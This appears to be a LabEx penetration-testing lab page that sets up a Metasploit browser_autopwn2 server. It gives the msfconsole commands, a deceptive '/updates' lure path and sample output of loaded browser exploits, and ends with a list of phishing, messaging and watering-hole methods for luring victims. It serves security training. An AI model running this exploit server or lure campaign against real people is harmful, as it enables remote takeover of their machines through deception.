LabEx
Log InJoin Free

Set up a Browser Autopwn Attack in Metasploit

Kali LinuxBeginner
Practice Now

Introduction

In this lab, you will delve into one of the powerful features of the Metasploit Framework: the browser autopwn attack. This type of attack involves setting up a malicious web server that, when visited by a target, automatically detects the victim's browser type and version, and then serves an exploit tailored to any discovered vulnerabilities.

We will be using the auxiliary/server/browser_autopwn2 module, an updated and more reliable version of the original browser autopwn. This lab will guide you through the process of selecting the module, configuring the necessary options, and launching the server.

Disclaimer: This lab is for educational purposes only. The techniques described should only be performed on systems you own or have explicit permission to test.

Select the auxiliary/server/browser_autopwn2 module

In this step, you will start the Metasploit Framework console and select the browser_autopwn2 module, which will be the core of our attack setup.

First, open a terminal and launch the Metasploit console. We'll use the -q flag for a "quiet" startup, which suppresses the banner for a cleaner interface.

msfconsole -q

Once the console is loaded, you will see the Metasploit prompt, which looks like msf6 >. Metasploit organizes its tools into modules. To set up our attack, we need to use the browser_autopwn2 auxiliary module. Use the use command to select it.

use auxiliary/server/browser_autopwn2

After executing the command, your prompt will change to indicate that you are now in the context of this specific module.

msf6 > use auxiliary/server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) >

You are now ready to configure the module's options.

Set the LHOST option to your Kali IP

In this step, you will configure the LHOST option. LHOST stands for "Local Host" and it must be set to the IP address of your attacking machine (the LabEx VM). When an exploit is successful, the victim's machine will connect back to this IP address, giving you control.

First, you need to find the IP address of your LabEx VM. You can open a new terminal tab by clicking the + icon in the terminal window. In the new terminal, run the following command to display your IP address:

ip addr show eth0 | grep "inet " | awk '{print $2}' | cut -d/ -f1

You will see an output similar to this. Make sure to copy your specific IP address.

10.0.2.15

Now, go back to your original terminal where msfconsole is running. To see all the configurable options for the browser_autopwn2 module, use the show options command.

show options

You will see a list of options. Notice that LHOST is required but not yet set. Use the set command to configure LHOST with the IP address you just copied. Replace YOUR_IP_ADDRESS with your actual IP.

set LHOST YOUR_IP_ADDRESS

For example, if your IP was 10.0.2.15, the command would be:

set LHOST 10.0.2.15

Metasploit will confirm the change.

LHOST => 10.0.2.15

The LHOST is now correctly configured.

Set the URIPATH for the malicious server

In this step, you will set the URIPATH. This option defines the specific path on your web server that the victim must visit to trigger the attack. Using a non-default, discreet path can make the attack less obvious.

Just like in the previous step, you can use show options to review the current settings. You'll see that URIPATH has a default value, but we will change it to something custom.

Let's set the path to /updates. This might trick a user into thinking they are visiting a software update page. Use the set command to change the URIPATH.

set URIPATH /updates

The console will confirm that the URIPATH has been updated.

URIPATH => /updates

Now, the malicious URL that a victim would need to visit will be http://<YOUR_IP_ADDRESS>:8080/updates.

Run the module to start the web server

In this step, with all the necessary options configured, you will launch the auxiliary module. This will start a web server on your machine that listens for incoming connections from potential victims.

To start the module, simply type run in the msfconsole prompt and press Enter.

run

Metasploit will now start the server and load all the relevant browser exploits. You will see a lot of output as the server initializes. The key information to look for is the confirmation that the server has started and the URL it is using.

The output will look something like this (some details may vary):

[*] Auxiliary module running as a background job 0.
[*] Using URL: http://10.0.2.15:8080/updates
[*] Server started.
[*] Starting the payload handler...
[*] Analyzing browser info and matching exploits...
[*] Added exploit/windows/browser/adobe_flash_avm2...
[*] Added exploit/windows/browser/adobe_flash_copy_pixels...
... (many more exploits will be listed) ...

Your malicious server is now running and actively waiting for a web browser to connect to http://10.0.2.15:8080/updates (with your actual IP). When a browser connects, the server will analyze it and attempt to launch a suitable exploit.

Discuss how to lure a target to the malicious URL

In this final step, we will discuss the most critical part of this attack: getting a target to visit the malicious URL. The server is running, but it's passive; it cannot do anything until a victim browses to the link. This phase relies heavily on social engineering.

Since this lab environment does not include a separate "victim" machine, this step is purely conceptual. There are no commands to execute.

Here are some common methods used to deliver the malicious link (http://YOUR_IP_ADDRESS:8080/updates) to a target:

  • Phishing Emails: Sending a deceptive email that encourages the user to click the link. For example, the email could pretend to be a security alert, a special offer, or a password reset notification.
  • Instant Messaging: Sending the link directly to a target via a chat application, often with a message like "Hey, check out this cool site!"
  • Social Media: Posting the link on a social media platform, either publicly or in a direct message, to entice clicks.
  • Watering Hole Attack: A more advanced technique where an attacker compromises a legitimate website that the target is known to frequent. The attacker then embeds the malicious link or a redirect on that site.

If a target with a vulnerable browser visits your URL, browser_autopwn2 will automatically serve the appropriate exploit. If the exploit is successful, a "session" will be opened on your Metasploit console, giving you remote access to the victim's machine. You would see a message like [*] Session 1 opened... in your terminal.

Summary

Congratulations on completing this lab! You have successfully learned the fundamental steps to set up a browser autopwn attack using the Metasploit Framework.

In this lab, you have:

  • Launched the Metasploit console.
  • Selected the auxiliary/server/browser_autopwn2 module.
  • Configured the essential LHOST and URIPATH options.
  • Started the malicious web server and understood its function.
  • Discussed the social engineering techniques required to lure a target to the malicious URL.

This exercise demonstrates how powerful and automated penetration testing tools can be. It also highlights the critical importance of keeping web browsers and their plugins updated to defend against such attacks. Always remember to use this knowledge responsibly and ethically.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux